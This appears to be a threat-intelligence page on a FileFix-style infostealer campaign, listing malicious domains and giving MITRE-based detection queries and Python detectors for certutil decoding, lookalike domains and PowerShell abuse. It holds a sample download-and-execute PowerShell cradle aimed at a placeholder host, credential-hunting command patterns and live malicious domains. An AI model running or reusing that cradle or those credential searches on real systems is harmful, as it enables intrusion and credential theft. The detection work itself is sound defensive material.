StegoFileFix Infostealer Campaign

Tags: FileFix, Steganography, ClickFix Variant, PowerShell Malware
A new FileFix attack variant moves beyond proof-of-concept to real-world exploitation. Attackers use multilingual phishing sites posing as Facebook Security to trick victims into pasting commands. The attack hides second-stage payloads inside JPG files using steganography, eventually delivering the StealC infostealer. This campaign shows rapid evolution, layered obfuscation, and global targeting.

Indicators of Compromise

mastercompu.com
thanjainatural.com
elprogresofood.com
facebook.windows-software-updates.com
facebook.windows-software-downloads.com
facebook.meta-software-worldwide.com
facebook.windows-software-updates.cc

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1056.001 - Keylogging

ID | Data Source | Data Component
DS0027 | Driver | Driver Load
Monitor for unusual kernel driver installation activity.

DS0009 | Process | OS API Execution
Monitor for API calls to SetWindowsHookEx, GetKeyState, and GetAsyncKeyState,[2] and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.

DS0024 | Windows Registry | Windows Registry Key Modification
Monitor for changes made to Windows Registry keys or values for unexpected modifications.


T1573.001 - Symmetric Cryptography

ID | Data Source | Data Component
DS0029 | Network Traffic | Network Traffic Content
Monitor and analyze traffic patterns and perform packet inspection for protocols that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlating with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., files that do not normally initiate connections for the respective protocol(s)).


T1566.002 - Spearphishing Link

ID | Data Source | Data Component
DS0015 | Application Log | Application Log Content
Monitor third-party application logging, messaging, and/or other artifacts that may indicate spearphishing emails with a malicious link sent in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[132][133] URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can help detect links leading to known malicious sites.[2] Detonation chambers can be used to detect these links, either by automatically visiting the sites to determine whether they are malicious or by waiting and capturing the content if a user visits the link.

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g., Cyrillic vs. Latin versions of trusted sites).

Analytic 1 - Detecting Phishing Emails with Malicious Links

(source="o365_audit" OR source="gmail_logs" OR source="email_gateway")
| where spf="fail" OR dkim="fail" OR dmarc="fail"
| where like(lower(subject), "%account security alert%") OR like(lower(subject), "%urgent action required%") OR like(lower(subject), "%password reset%")
| where like(url, "%tinyurl.com%") OR like(url, "%bit.ly%") OR like(url, "%@%") OR like(url, "%.xyz%") OR like(url, "%.top%")
| eval risk_score=case(spf="fail" AND dkim="fail", 9, like(url, "%@%"), 8, like(url, "%.xyz%") OR like(url, "%.top%"), 7)
| where risk_score >= 7
| stats count by _time, sender, recipient, subject, url, risk_score

Note that case() returns null when no branch matches, so a row that only fails SPF and carries a bit.ly link is dropped by the risk_score filter; add a default branch if that is not the intent.

DS0029 | Network Traffic | Network Traffic Content
Monitor and analyze SSL/TLS traffic patterns and perform packet inspection for protocols that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlating with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., files that do not normally initiate connections for the respective protocol(s)).

Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g., Cyrillic vs. Latin versions of trusted sites).

Analytic 1 - Detecting Clicks on Malicious Links in Phishing Emails

(EventCode=3) OR (source="zeek_http_logs" uri IN (malicious_url_list)) OR (source="proxy_logs" url IN (malicious_url_list))
| eval risk_score=case(domain IN ("bit.ly", "tinyurl.com"), 8, like(domain, "%.xyz") OR like(domain, "%.top"), 7, uri IN (malicious_url_list), 9)
| where risk_score >= 7
| stats count by _time, host, user, uri, domain, risk_score

DS0029 | Network Traffic | Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1140 - Deobfuscate/Decode Files or Information

ID | Data Source | Data Component
DS0022 | File | File Modification
Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn't be further modified) that may coincide with attempts to hide artifacts.

DS0009 | Process | Process Creation
Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.

CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used: -encodehex and -decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.

Analytic Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic is oriented around the creation of CertUtil.exe processes, which may be used to encode and decode files, including PE and script code. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process.

Analytic 1 - CertUtil with Decode Argument

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688"))
Image="*\certutil.exe" CommandLine="*decode*"

The wildcard on CommandLine matches both -decode and -decodehex, and certutil accepts "/" as well as "-" for switches, so do not anchor on the switch prefix.

DS0012 | Script | Script Execution
Monitor for attempts to enable script execution on a system; these would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
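The two halves of the CertUtil guidance above (the command line that performs the decode, and the base64 wrapper that pretends to be a certificate) can both be checked offline. The following is an added example written for this page, not code from the original page or from any vendor: it normalizes the switch prefix and casing when looking for decode switches, and classifies what a "-----BEGIN CERTIFICATE-----" wrapper actually decodes to, since a genuine certificate is DER (first byte 0x30) whereas a smuggled payload is typically a PE ("MZ") or script text. The command lines and the wrapped payloads are constructed samples; hex-dump (-encodehex) output is not parsed here.

```python
import base64
import binascii
import re

# Switches that turn an encoded/hex-dumped file back into its original bytes.
# certutil accepts either prefix, so "-decode" and "/decode" are equivalent.
DECODE_SWITCHES = {"decode", "decodehex"}

PEM_TAGS = re.compile(r"-----(?:BEGIN|END) CERTIFICATE-----")


def certutil_decode_switches(cmdline: str) -> list:
    """Return the decode switches found on a certutil command line, lower-cased.

    Both switch prefixes and any casing are accepted, so 'CERTUTIL /DecodeHex' is
    caught as well as 'certutil.exe -decode'. Only tokens that start a whitespace-
    delimited argument are considered, so '/a.txt' inside a URL is not a switch.
    """
    if not re.search(r"certutil(?:\.exe)?\b", cmdline, re.I):
        return []
    tokens = re.findall(r"(?:^|\s)[-/]([A-Za-z]+)\b", cmdline)
    return [t.lower() for t in tokens if t.lower() in DECODE_SWITCHES]


def classify_certutil_blob(text: str) -> str:
    """Classify what a certutil -encode wrapper actually contains.

    A genuine certificate decodes to DER, which starts with an ASN.1 SEQUENCE tag (0x30).
    Anything else between the tags (a PE file, a script) is what the technique hides.
    Returns one of: 'der', 'pe', 'text', 'binary', or 'invalid' if the body is not base64.
    """
    body = "".join(PEM_TAGS.sub("", text).split())
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error:
        return "invalid"
    if not raw:
        return "invalid"
    if raw[:2] == b"MZ":
        return "pe"
    if raw[:1] == b"\x30":
        return "der"
    try:
        raw.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "binary"


def wrap_like_certutil(payload: bytes) -> str:
    """Reproduce the shape of -encode output (64-column base64 between certificate tags).
    Constructed here so the checks run offline; this is not certutil's own code."""
    b64 = base64.b64encode(payload).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join(["-----BEGIN CERTIFICATE-----", *lines, "-----END CERTIFICATE-----", ""])


if __name__ == "__main__":
    # Constructed command lines, as they would appear in Sysmon EID 1 / Security 4688.
    for cmd in ("certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
                "certutil /decode a.txt a.exe",
                "CERTUTIL.EXE -DecodeHex dump.txt out.bin"):
        print(cmd, "->", certutil_decode_switches(cmd))
    # A wrapper that claims to be a certificate but decodes to a PE header.
    print(classify_certutil_blob(wrap_like_certutil(b"MZ\x90\x00" + bytes(60))))
```

During triage, run classify_certutil_blob over the file named on the decode command line before it is removed; a result other than "der" is the downloaded payload the text above describes.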


T1583.001 - Domains

ID | Data Source | Data Component
DS0038 | Domain Name | Active DNS
Monitor queried domain name system (DNS) registry data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.

DS0038 | Domain Name | Domain Registration
Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.[100] Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.

DS0038 | Domain Name | Passive DNS
Monitor logged domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
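The Domain Registration guidance ("domains created with a similar structure to your own, including under a different TLD") and the homograph notes under T1566.002 both describe string checks that can run over new-domain feeds or DNS logs. This is an added example, not code from the page or from any tool it mentions. It flags three patterns visible in this campaign's indicators: a brand name used as a subdomain of an unrelated registrable domain (facebook.windows-software-updates.com), a brand embedded in the registrable label itself (meta-software-worldwide.com), and a label that mixes Unicode scripts after punycode decoding. The brand list, the owned-domain set and the two-label "registrable domain" rule are assumptions for the example (a real deployment would use the Public Suffix List); the homograph domain is constructed.

```python
import unicodedata

# Assumptions for the example: brands whose impersonation we care about, and the
# registrable domains we actually own (anything else carrying the brand is suspect).
BRANDS = ("facebook", "meta", "windows")
OWNED = {"facebook.com", "meta.com"}


def to_unicode(domain: str) -> str:
    """Decode punycode (xn--) labels so homograph characters can be inspected."""
    labels = []
    for label in domain.lower().rstrip(".").split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def scripts_in(label: str) -> set:
    """Script family of each letter, taken from the first word of its Unicode name
    (e.g. 'CYRILLIC SMALL LETTER A' -> 'CYRILLIC'). Approximate but dependency-free."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def registrable(labels: list) -> str:
    # Assumption: plain two-label suffix. The Public Suffix List is needed for
    # registries such as .co.uk, where this rule returns the wrong answer.
    return ".".join(labels[-2:])


def assess(domain: str) -> list:
    """Return human-readable findings for one domain; an empty list means nothing matched."""
    labels = to_unicode(domain).split(".")
    reg = registrable(labels)
    if reg in OWNED:
        return []
    findings = []
    for label in labels[:-2]:                       # subdomain labels only
        for brand in BRANDS:
            if brand in label:
                findings.append(f"brand '{brand}' as subdomain of unrelated domain {reg}")
    for brand in BRANDS:                            # brand inside the registrable label itself
        if brand in labels[-2]:
            findings.append(f"brand '{brand}' in registrable domain {reg}")
    for label in labels:                            # mixed or non-Latin script: homograph
        scripts = scripts_in(label)
        if scripts and scripts != {"LATIN"}:
            findings.append(f"label '{label}' mixes scripts {sorted(scripts)}")
    return findings


def scan(domains) -> dict:
    return {d: assess(d) for d in domains}


# Indicators listed on this page, plus one constructed homograph:
# Cyrillic 'а' (U+0430) in place of the Latin 'a' in facebook.com.
IOC_DOMAINS = [
    "mastercompu.com",
    "facebook.windows-software-updates.com",
    "facebook.meta-software-worldwide.com",
    "facebook.windows-software-updates.cc",
]
HOMOGRAPH = "f\u0430cebook.com"

if __name__ == "__main__":
    punycode = HOMOGRAPH.encode("idna").decode("ascii")   # what the DNS log would show
    for d, f in scan(IOC_DOMAINS + [punycode]).items():
        print(d, "->", f or "clean")
```

mastercompu.com comes back clean: a lookalike check only catches brand abuse, so compromised legitimate hosts used as stagers still need the reputation and passive-DNS sources described above.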


T1055 - Process Injection

ID | Data Source | Data Component
DS0022 | File | File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

DS0022 | File | File Modification
Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

DS0011 | Module | Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.

DS0009 | Process | OS API Execution
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.[95] Monitoring for Linux-specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.[96] [97] [98] [99]

DS0009 | Process | Process Access
Monitor for processes opening handles to other processes (for example, Sysmon Event ID 10) in a way that may precede code injection intended to evade process-based defenses or elevate privileges.

DS0009 | Process | Process Metadata
Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.[100]

DS0009 | Process | Process Modification
Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.


T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay

ID | Data Source | Data Component
DS0029 | Network Traffic | Network Traffic Content
Monitor for traffic on UDP 5355 (LLMNR) and UDP 137 (NetBIOS Name Service) if LLMNR/NetBIOS is disabled by security policy.

DS0029 | Network Traffic | Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.

DS0019 | Service | Service Creation
Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045.[4] Deploy an LLMNR/NBT-NS spoofing detection tool.[17]

DS0024 | Windows Registry | Windows Registry Key Modification
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.


T1087 - Account Discovery

ID | Data Source | Data Component
DS0017 | Command | Command Execution
Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery.

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

DS0022 | File | File Access
Monitor access to file resources that contain local accounts and groups information such as /etc/passwd, /Users directories, and the SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

DS0009 | Process | Process Creation
Monitor for processes that can be used to enumerate user accounts and groups such as net.exe and net1.exe, especially when executed in quick succession.[10] Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.


T1588.001 - Malware

ID | Data Source | Data Component
DS0004 | Malware Repository | Malware Content
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.[21]

DS0004 | Malware Repository | Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.


T1552.001 - Credentials In Files

ID | Data Source | Data Component
DS0017 | Command | Command Execution
Monitor executed commands and arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials).

Analytic 1 - Commands indicating credential searches in files

(index=security sourcetype="Powershell" EventCode=4104 (ScriptBlockText="*password*" OR ScriptBlockText="*credential*"))
OR (index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (CommandLine="*password*" OR CommandLine="*credential*"))
OR (index=os sourcetype="linux_audit" action="execve" (CommandLine="*password*" OR CommandLine="*credential*" OR CommandLine="*passwd*" OR CommandLine="*secret*"))
OR (index=os sourcetype="macos_secure" event_type="execve" (CommandLine="*password*" OR CommandLine="*credential*" OR CommandLine="*passwd*" OR CommandLine="*secret*"))

The wildcards matter: a bare CommandLine="password" is an exact match and would only fire on a command line consisting of that single word. Script block events (4104) carry the script in ScriptBlockText, not CommandLine.

DS0022 | File | File Access
Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained.

Analytic 1 - Unauthorized access to files containing credentials

(index=security sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("*password*", "*credential*", "*secret*", "*token*"))
OR (index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename IN ("*password*", "*credential*", "*secret*", "*token*"))
OR (index=os sourcetype="linux_audit" action="open" filepath IN ("*password*", "*credential*", "*passwd*", "*shadow*", "*.pem", "*.key", "*secret*", "*token*"))
OR (index=os sourcetype="macos_secure" event_type="open" file_path IN ("*password*", "*credential*", "*passwd*", "*shadow*", "*.pem", "*.key", "*secret*", "*token*"))

Sysmon Event ID 11 (FileCreate) records the path in TargetFilename; TargetObject is the field used by the registry events.

DS0009 | Process | Process Creation
Monitor newly executed processes that search local file systems and remote file shares for files containing insecurely stored credentials.

Note: Pseudocode Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic looks for command-line instances of searching the Windows Registry for insecurely stored credentials. This can be accomplished using the query functionality of the Reg system utility, by looking for keys and values that contain strings such as "password". In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.

Analytic 1 - Credentials in Files & Registry

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688"))
(CommandLine="*reg query HKLM /f password /t REG_SZ /s*" OR CommandLine="*reg query HKCU /f password /t REG_SZ /s*" OR CommandLine="*Get-UnattendedInstallFile*" OR CommandLine="*Get-Webconfig*" OR CommandLine="*Get-ApplicationHost*" OR CommandLine="*Get-SiteListPassword*" OR CommandLine="*Get-CachedGPPPassword*" OR CommandLine="*Get-RegistryAutoLogon*")


T1059.001 - PowerShell

ID | Data Source | Data Component
DS0017 | Command | Command Execution
Even when a restrictive execution policy is set, adversaries who obtain administrator or SYSTEM access can define their own execution policy, either through the Registry or at the command line (for example, -ExecutionPolicy Bypass). A change in this policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which also applies to .NET invocations).[321] PowerShell 5.0 introduced enhanced logging capabilities (script block logging, module logging, and transcription), and some of those features have since been backported to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[322] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.

PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.

For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName <RemoteHost> creates a remote PowerShell session.

Analytic 1 - Look for unusual PowerShell execution

sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational EventCode=4104
| eval suspicious_cmds=if(like(Message, "%-EncodedCommand%") OR like(Message, "%Invoke-Expression%") OR like(Message, "%IEX%") OR like(Message, "%DownloadFile%"), "Yes", "No")
| where suspicious_cmds="Yes"

DS0011 | Module | Module Load
Monitor for loading and/or execution of artifacts associated with PowerShell-specific assemblies, such as System.Management.Automation.dll (especially by unusual process names/locations).[3][4]

Analytic 1 - Processes loading PowerShell assemblies

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=7
ImageLoaded IN ("*\System.Management.Automation.dll", "*\System.Management.Automation.ni.dll")
NOT Image IN ("*\powershell.exe", "*\powershell_ise.exe", "*\pwsh.exe")
| stats count by ComputerName, Image, ImageLoaded

The assembly is loaded from the Global Assembly Cache (the .ni.dll form is the native image), not from System32, so match on the file name with a wildcard rather than a fixed path; powershell.exe itself is a process image, not a loaded module, and is excluded here so that the remaining hits are unusual hosts of the PowerShell engine.

DS0009 | Process | Process Creation
Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Without script block logging, execution of PowerShell scripts is largely opaque and not typically inspected by antivirus, which makes PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

PowerShell can be used to hide monitored command-line execution such as:

net use
sc start

Note:
- The logic for Analytic 1 is based around detecting non-interactive PowerShell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.
- The logic for Analytic 2 is based around detecting remote PowerShell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.

Analytic 1 - Non-interactive PowerShell Sessions

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688"))
Image="*\powershell.exe" NOT ParentImage="*\explorer.exe"

Analytic 2 - Remote PowerShell Sessions

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688"))
Image="*\wsmprovhost.exe" ParentImage="*\svchost.exe"

Analytic 3 - PowerShell Execution

source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1"
Image="C:\Windows\*\powershell.exe" NOT ParentImage="C:\Windows\explorer.exe"
| stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName

DS0009 | Process | Process Metadata
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as whether PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[323]

DS0012 | Script | Script Execution
Monitor for attempts to enable script execution on a system; these would be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Script Block Logging Events

source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104"
(ScriptBlockText="*-enc*" OR ScriptBlockText="*-ep bypass*" OR ScriptBlockText="*-noni*")

Event 4104 has no Image or CommandLine fields; the launch switches appear inside ScriptBlockText when a script spawns another PowerShell instance.
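The PowerShell analytics above combine three separate signals: the parent process (non-interactive), the launch switches (-enc, -ep bypass, -noni, -w hidden), and the content of the script, which for an -EncodedCommand launch is only visible after base64 and UTF-16LE decoding. The following added example (written for this page, not code from the original or from the campaign) scores a process-creation event on all three, decoding the encoded command so that IEX/DownloadString indicators are matched in the plaintext rather than missed in the base64. The events, the parent-process allow list, the weights and the stager text are constructed; the URL is a placeholder, not an indicator from this campaign.

```python
import base64
import re
from typing import Optional

# Flag patterns use the abbreviations PowerShell accepts as parameter prefixes, so
# '-enc', '-ec' and '-e' all count as "encoded command" and '-w hidden' as "hidden window".
SUSPICIOUS_FLAGS = {
    r"-(?:e|ec|en|enc|encodedcommand)\b": "encoded command",
    r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b": "execution policy bypass",
    r"-(?:noni|noninteractive)\b": "non-interactive switch",
    r"-(?:w|win|window|windowstyle)\s+hidden\b": "hidden window",
    r"-(?:nop|noprofile)\b": "no profile",
}
# Content indicators from the page's analytics; searched in the decoded script as well.
SUSPICIOUS_CONTENT = ("invoke-expression", "iex", "downloadstring", "downloadfile",
                      "net.webclient", "frombase64string", "invoke-webrequest")
INTERACTIVE_PARENTS = {"explorer.exe"}   # assumption: what an interactive launch looks like


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return the plaintext script or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one process-creation event (Sysmon EID 1 / Security 4688 field names)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return {"powershell": False, "score": 0, "reasons": [], "decoded": None}
    reasons, score = [], 0
    if parent not in INTERACTIVE_PARENTS:
        reasons.append(f"non-interactive parent: {parent or 'unknown'}")
        score += 1
    for pattern, label in SUSPICIOUS_FLAGS.items():
        if re.search(pattern, cmd, re.I):
            reasons.append(label)
            score += 2
    decoded = decode_encoded_command(cmd)
    haystack = (decoded or "") + " " + cmd        # plaintext script first, raw command line second
    for needle in SUSPICIOUS_CONTENT:
        if re.search(r"\b" + re.escape(needle) + r"\b", haystack, re.I):
            reasons.append(f"content: {needle}")
            score += 3
    return {"powershell": True, "score": score, "reasons": reasons, "decoded": decoded}


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events. The download cradle is generic; the host is a placeholder.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_for_powershell(STAGER)},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The decoded script is returned alongside the score so the analyst sees the cradle in the alert rather than a base64 blob; the same decoding belongs in front of any string-based rule on 4688 or Sysmon EID 1 data, otherwise the IEX and DownloadString matches above never fire for encoded launches.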


T1078 - Valid Accounts

ID | Data Source | Data Component
DS0028 | Logon Session | Logon Session Creation
Monitor for newly constructed logon behavior that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).

Analytic 1 - Interactive or RDP logons from unexpected sources

sourcetype="WinEventLog:Security" EventCode=4624 LogonType IN ("2", "10")
| eval is_suspicious=if(src_ip!="expected_ip", "True", "False")
| where is_suspicious="True"
| table _time, user, src_ip, dest_ip, LogonType

LogonType 2 is an interactive (console) logon and 10 is RemoteInteractive (RDP). "expected_ip" is a placeholder; in practice compare src_ip against a lookup of known-good sources per user rather than a single literal.

DS0028 | Logon Session | Logon Session Metadata
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.

DS0002 | User Account | User Account Authentication
Monitor for an attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
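The Logon Session Metadata guidance above names two checks that a single-event search cannot express: one account with sessions open on more than one host at the same instant, and logons outside business hours. The following added example (written for this page, not code from the original) runs both over constructed session records of the kind a SIEM produces by pairing 4624 with the matching 4634/4647 logoff. The session rows, the business-hours window (08:00 to 18:00, host-local) and the choice to consider only logon types 2 and 10 for the concurrency check are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, time


def parse(rows):
    """Rows are (user, host, src_ip, logon_type, start, end) with ISO-8601 timestamps."""
    out = []
    for user, host, src_ip, logon_type, start, end in rows:
        out.append({"user": user, "host": host, "src_ip": src_ip, "type": int(logon_type),
                    "start": datetime.fromisoformat(start), "end": datetime.fromisoformat(end)})
    return out


def concurrent_hosts(sessions, interactive_types=(2, 10)):
    """Accounts with interactive sessions open on more than one host at the same instant.
    Returns {user: sorted list of hosts involved}; users with no overlap are absent."""
    by_user = defaultdict(list)
    for s in sessions:
        if s["type"] in interactive_types:
            by_user[s["user"]].append(s)
    hits = {}
    for user, items in by_user.items():
        items.sort(key=lambda s: s["start"])
        for i, cur in enumerate(items):
            # Earlier sessions on a different host that have not ended when this one starts.
            others = {o["host"] for o in items[:i]
                      if o["end"] > cur["start"] and o["host"] != cur["host"]}
            if others:
                hits[user] = sorted(others | {cur["host"]} | set(hits.get(user, [])))
    return hits


def off_hours(sessions, start=time(8), end=time(18)):
    """Sessions that begin outside the assumed business-hours window."""
    return [s for s in sessions if not (start <= s["start"].time() < end)]


# Constructed sample: alice's RDP session on WS07 overlaps her console session on WS01;
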